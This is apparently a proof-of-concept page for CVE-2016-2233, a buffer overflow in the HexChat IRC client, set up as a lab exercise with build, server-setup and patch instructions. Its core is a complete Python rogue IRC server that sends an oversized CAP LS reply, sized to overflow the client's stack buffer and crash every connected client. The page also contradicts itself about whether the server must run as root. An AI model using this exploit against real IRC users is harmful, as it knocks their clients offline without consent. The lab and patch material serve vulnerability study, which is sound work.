
CVE-2016-2233 PoC — HexChat Buffer Error Vulnerability

Associated Vulnerability
Title: HexChat Buffer Error Vulnerability (CVE-2016-2233)
Description: Stack-based buffer overflow in the inbound_cap_ls function in common/inbound.c in HexChat 2.10.2 allows remote IRC servers to cause a denial of service (crash) via a large number of options in a CAP LS message.
Description
This is an exploitation guide for CVE-2016-2233
Readme
# CVE-2016-2233

CVE-2016-2233 is a stack-based buffer overflow in HexChat, a widely used IRC client. We set up an IRC server, launch the attack from it, and crash every client connected to that server. The attack was carried out on Ubuntu 12.04 using Python. We also wrote a patch for the vulnerability and confirmed with several tests that it removes the crash.

## How to install HexChat
System Environment: Ubuntu 12.04 (SEED image)

Python Version: 2.7.12

To set up the build dependencies, run:

````bash
sudo apt-get update
sudo apt-get install gnome-common libglib2.0-dev libgtk2.0-dev
````

Then extract hexchat-2.10.2.tar.gz (the archive included in this repository, see the file snapshot below) and enter the resulting directory. Build and install with:
````bash
./autogen.sh
./configure
make
sudo make install
````
## How to Setup IRCD-IRC2 on Server

Install ircd-irc2 with:
````bash
sudo apt install ircd-irc2
````
After installation, restart NetworkManager and (re)start the IRC daemon:
````bash
sudo systemctl restart NetworkManager
sudo systemctl restart ircd-irc2
````
These commands are written for a systemd-based Ubuntu (15.04 or later). On an Ubuntu 12.04 host, which uses upstart, the equivalents are `sudo apt-get install ircd-irc2` and `sudo service ircd-irc2 restart`.

## How to Connect to Server

1. Find HexChat and double click to open
2. Set up nicknames
3. Press “Add” to add a network server
4. Name the server as “CVE Server” and press enter to confirm
5. Then press “Edit” to set up details such as IP address and Port number of the server
6. Edit the server in the pop-up window. 
7. Set the IP address to 10.0.2.6, and use default port 6667
8. Press “Connect” and enter any channel name when prompted
9. Repeat these steps on the other client, joining the same channel, so that both clients are connected to the server


## How to Exploit Attack

The exploit is run on the server host. The attacker stops the real IRC daemon, binds the port the clients are already configured to use (6667), and, when the clients reconnect, answers their CAP LS with a CAP LS reply carrying a very large list of options. HexChat copies the options into a fixed-size stack buffer in inbound_cap_ls, the buffer overflows, and every connected client crashes.

1. The clients connect to the real IRC server (see the previous section).
2. Stop the IRC service and restart NetworkManager so the change takes effect:
````bash
sudo systemctl kill ircd-irc2
sudo systemctl restart NetworkManager
````
3. Run attack.py on the server host. HexChat reconnects automatically after the connection drops, so the rogue server receives a fresh CAP LS from each client and can deliver the payload.
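The following is an added example of the rogue server described above, written in Python 3; it is not the attack.py shipped in this repository, whose contents are not shown on this page. It implements exactly the step the README describes: accept the reconnecting client, wait for its CAP LS, and answer with a CAP LS reply whose option list is far longer than the 256-byte stack buffer in inbound_cap_ls. Two details come from the upstream HexChat 2.10.2 source rather than from this page and are assumptions here: only capability names HexChat recognises (such as `multi-prefix`) are copied into that buffer, so a known name is repeated instead of random junk, and HexChat truncates inbound lines longer than 2048 bytes, so the payload is kept under that limit. The listen address, the server prefix `irc.cve.test` and the token count of 150 are arbitrary choices.

```python
#!/usr/bin/env python3
"""Rogue IRC server that answers CAP LS with an oversized option list.

Added example (Python 3), not the attack.py shipped in this repository.
Assumed details not stated on the page: the repeated token "multi-prefix",
the listen address, the server prefix and the 150-token count.
"""
import socket
import threading

LISTEN_HOST = "0.0.0.0"
LISTEN_PORT = 6667            # port the stopped ircd-irc2 was listening on
SERVER_NAME = "irc.cve.test"  # arbitrary message prefix; HexChat does not verify it
CAPABILITY = "multi-prefix"   # a capability HexChat 2.10.2 recognises and requests
REPEATS = 150
MAX_LINE = 2048               # HexChat's inbound line buffer size (upstream server.c)
VULN_BUFFER = 256             # size of the CAP REQ stack buffer in inbound_cap_ls


def build_cap_ls_reply(nick, capability=CAPABILITY, repeats=REPEATS):
    """Return b':<server> CAP <nick> LS :<cap> <cap> ...\\r\\n'.

    inbound_cap_ls splits the trailing parameter on spaces and appends each
    recognised capability (plus a space) to a 256-byte stack buffer, so the
    total length of recognised tokens decides whether the buffer overflows.
    """
    if repeats < 1:
        raise ValueError("need at least one capability token")
    tokens = " ".join([capability] * repeats)
    line = ":%s CAP %s LS :%s\r\n" % (SERVER_NAME, nick, tokens)
    if len(line) > MAX_LINE:
        # Past this size HexChat truncates the line instead of overflowing,
        # so a bigger payload is weaker, not stronger.
        raise ValueError("line exceeds HexChat's %d-byte line buffer" % MAX_LINE)
    return line.encode("ascii")


def recognised_payload_length(reply):
    """Bytes that inbound_cap_ls would strcat after 'CAP REQ :' (token + space each)."""
    trailing = reply.decode("ascii").rstrip("\r\n").split(" :", 1)[1]
    return sum(len(tok) + 1 for tok in trailing.split(" "))


def overflows_vuln_buffer(reply):
    """True if 'CAP REQ :' + recognised tokens + NUL no longer fits in 256 bytes."""
    return len("CAP REQ :") + recognised_payload_length(reply) + 1 > VULN_BUFFER


def handle_client(conn, addr):
    """Consume the client's registration traffic, then deliver the payload."""
    nick = "*"
    data = b""
    conn.settimeout(5.0)
    try:
        # HexChat sends "CAP LS", then "NICK"/"USER", right after connecting.
        while b"CAP LS" not in data and b"USER " not in data:
            chunk = conn.recv(4096)
            if not chunk:
                return
            data += chunk
        for line in data.split(b"\r\n"):
            if line.startswith(b"NICK "):
                nick = line[5:].decode("ascii", "replace").strip()
        conn.sendall(build_cap_ls_reply(nick))
        print("[*] sent oversized CAP LS to %s:%d (nick %s)" % (addr[0], addr[1], nick))
    except (socket.timeout, OSError) as exc:
        print("[-] %s:%d: %s" % (addr[0], addr[1], exc))
    finally:
        conn.close()


def serve(host=LISTEN_HOST, port=LISTEN_PORT):
    """Accept connections on the IRC port; one thread per reconnecting client."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(16)
        print("[*] rogue IRC server listening on %s:%d" % (host, port))
        while True:
            conn, addr = srv.accept()
            threading.Thread(target=handle_client, args=(conn, addr), daemon=True).start()


if __name__ == "__main__":
    serve()
```

Run it as root (port 6667 is privileged only if below 1024 on your system; 6667 is not, but the real daemon must already be stopped so the bind succeeds). With the default settings the reply is 1979 bytes long and carries 1950 bytes of recognised capability text, roughly seven times the 256-byte buffer, while staying under the 2048-byte line limit.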


## How to patch

Replace common/inbound.c in the HexChat 2.10.2 source tree with the patched inbound.c from this repository, then rebuild and reinstall:
````bash
./autogen.sh
./configure
make
sudo make install
````
After reinstalling, rerun the attack from the previous section: a patched client stays connected instead of crashing.



File Snapshot

````
[4.0K] /data/pocs/3caf727b6dbaf19a003aa70170e0800cd89c1353
├── [2.3K] attack.py
├── [2.6M] hexchat-2.10.2.tar.gz
├── [ 42K] inbound.c
└── [2.3K] README.md

0 directories, 4 files
````